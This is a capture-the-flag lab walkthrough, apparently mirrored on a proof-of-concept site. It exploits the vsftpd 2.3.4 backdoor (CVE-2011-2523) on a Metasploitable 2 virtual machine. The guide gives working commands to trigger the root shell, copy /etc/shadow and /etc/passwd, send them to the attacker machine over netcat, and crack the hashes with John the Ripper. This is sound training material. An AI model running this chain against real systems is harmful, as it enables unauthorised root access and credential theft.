来源

关联漏洞

介绍

# Scenario Capture the Flag - CVE-2011-2523
Capture the decrypted `/etc/shadow` and `/etc/passwd` file from vulnerable Metasploitable 2 server.
# Setup Enviornment
## Step 1: Download an unzip virtual machine
For this CTF, we run VMware Workstation Pro with two virtual machines. We utilize Kali Linux as the attacker's machine and Metasploitable 2 as the vulnerable machine. 
-	Download and Install VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
-	Download and Extract Kali Linux Virtual Machine: https://www.kali.org/get-kali/
-	Download and Extract Metasploitable 2 Virtual Machine: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ 
## Step 2: Open Kali Linux and Metasploitable 2 Virtual Machines in VMware from extracted file
-	Choose `Open a Virtual Machine` Option in VMware Workstation and select unzipped Kali Linux file
-	Right click on slide bar and select `open` option, then select unzipped Metasploitable 2 file
-	Press `Play virtual machine` button on both virtual machines
-	When prompted to select `I moved It` or `I copied It` option, select `I copied It` option
## Step 3: Login
-	Login to Kali Linux using `kali` as the username and password
-	Login to Metasploitable using `msfadmin` as the username and password
## Step 4: Record IP address of Metasploitable virtual machine
-	Run `ip addr show` and record IP address of the `inet` section

# Solution
Massachusetts Institute of Technology Research and Engineering detail CVE-2011-2523 as a common vulnerability and exposure where ```vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp```.
## Step 1: Search for open ports on Metasploitable machine using FTP service
-	`nmap <vulnerable-machine-ip-address>`
-	nmap scan should show an open port on port 21 using the ftp service
## Step 2: Attempt to NetCat into open port
-	`nc <vulnerable-machine-ip-address> 21`
-	Username is any string with `:)` on the end, enter `user <string>:)`
-	When prompted for a password enter any string `pass <string>`
-	Then exit connection using ^C [CTRL + C], a shell at root to Metasploitable has been opened on port 6200.
## Step 3: Connect to shell on port 6200 of the vulnerable machine
-	` nc -v <vulnerable-machine-ip-address> 6200`
-	Show ip address of current connection `ip addr show`
-	Show that root access was granted using `whoami`
## Step 4: Copy `/etc/shadow` and `/etc/passwd` file into another file
-	`cp /etc/shadow shadow.txt`
-	`cp /etc/passwd passwd.txt`
## Step 5: Send copied files to Kali Linux machine using NetCat
-	On attacker machine, lookup the ip address under `inet` using command `ip addr show`
-	Listen for files using `nc -l -p 1234 > shadow.txt` on attacker machine
-	In root shell on Metasploitable `nc -w 3 <destination-ip> 1234 < shadow.txt`
-	Repeat for passwd file
## Step 5: Format shadow file into `John` tool format
-	`unshadow passwd.txt shadow.txt > unshadowed-input`
-	Observe the file using `cat unshadowed-input`, should have username and password stored
## Step 6: Decrypt shadow file using `John` command and wordlist
-	Utilize the wordlist `rockyou.txt` to crack hashes using john
-	Unzip wordlist file on Kali Linux using `sudo gzip -d /usr/share/wordlists/rockyou.txt.gz`
-	When promoted for a password, use the default admin password for Kali Linux `kali`
-	Unhash passwords using `john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt`
-	View cracked passwords `john –show unshadowed-input`

文件快照

 [4.0K]  /data/pocs/71f014fdbea60e57b657f829c3bb49584e63d680
└── [3.5K]  README.md

0 directories, 1 file

备注